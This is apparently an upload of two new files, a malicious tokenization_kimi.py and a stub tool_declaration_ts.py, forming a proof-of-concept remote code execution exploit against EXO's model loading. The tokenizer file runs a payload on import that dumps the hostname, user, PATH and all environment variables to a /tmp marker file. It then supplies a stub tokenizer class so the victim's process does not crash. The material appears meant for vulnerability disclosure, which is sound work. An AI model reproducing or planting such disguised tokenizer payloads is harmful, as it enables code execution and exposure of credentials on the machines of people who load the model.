Upload 2 files

tokenization_kimi.py

@@ -0,0 +1,73 @@
+# Malicious tokenization_kimi.py - PoC Payload
+# This file will be executed via exec() when EXO loads a model with "kimi-k2" in the name
+import os
+import sys
+import socket
+import subprocess
+from pathlib import Path
+
+# ============================================================================
+# PAYLOAD CONFIGURATION
+# ============================================================================
+POC_MARKER_FILE = "/tmp/exo_rce_poc_pwned.txt"  # Proof of execution
+
+# ============================================================================
+# PAYLOAD EXECUTION
+# ============================================================================
+def execute_payload():
+    """
+    This function executes when EXO loads the tokenizer.
+    Creates a marker file with system information as proof of code execution.
+    """
+    
+    # --- MARKER FILE (Proof of execution) ---
+    try:
+        with open(POC_MARKER_FILE, "w") as f:
+            f.write("=== EXO RCE PoC - Successful Exploitation ===\n")
+            f.write(f"Hostname: {socket.gethostname()}\n")
+            f.write(f"User: {os.getenv('USER', 'unknown')}\n")
+            f.write(f"CWD: {os.getcwd()}\n")
+            f.write(f"Python: {sys.executable}\n")
+            f.write(f"PATH: {os.getenv('PATH', '')}\n")
+            f.write("\n--- Environment Variables ---\n")
+            for key, value in sorted(os.environ.items()):
+                f.write(f"{key}={value}\n")
+        print(f"[+] PoC marker file written to: {POC_MARKER_FILE}")
+    except Exception as e:
+        print(f"[-] Failed to write marker file: {e}")
+
+# Execute payload immediately when this module is loaded
+execute_payload()
+
+# ============================================================================
+# STUB TOKENIZER CLASS (Required to avoid runtime errors)
+# ============================================================================
+# EXO expects to find TikTokenTokenizer class in this module
+# We provide a minimal stub to prevent crashes after exploitation
+
+class TikTokenTokenizer:
+    """
+    Stub tokenizer class to satisfy EXO's expectations.
+    The payload has already executed by the time this class is instantiated.
+    """
+    
+    def __init__(self, *args, **kwargs):
+        self.model = self
+        self.eos_token_id = 0
+        print("[+] TikTokenTokenizer stub initialized (payload already executed)")
+    
+    @classmethod
+    def from_pretrained(cls, model_path, *args, **kwargs):
+        """Stub from_pretrained method"""
+        print(f"[+] TikTokenTokenizer.from_pretrained called with: {model_path}")
+        return cls()
+    
+    def encode(self, text, allowed_special=None):
+        """Stub encode method - returns dummy token IDs"""
+        return [1, 2, 3]  # Dummy tokens
+    
+    def decode(self, tokens, *args, **kwargs):
+        """Stub decode method"""
+        return "decoded_text"
+
+print("[+] Malicious tokenization_kimi.py module loaded successfully")

tool_declaration_ts.py

@@ -0,0 +1,18 @@
+# tool_declaration_ts.py - Stub file
+# This file is imported by tokenization_kimi.py in legitimate Kimi models
+# We provide a minimal stub to prevent import errors
+
+"""
+Tool declaration module stub for Kimi tokenizer.
+The original Kimi model uses this for tool/function calling support.
+For the PoC, we only need this to exist to prevent import errors.
+"""
+
+# Minimal stub - add whatever is needed to prevent import errors
+# The real payload executes in tokenization_kimi.py before this is used
+
+def dummy_function():
+    """Placeholder function"""
+    pass
+
+print("[+] tool_declaration_ts.py stub loaded")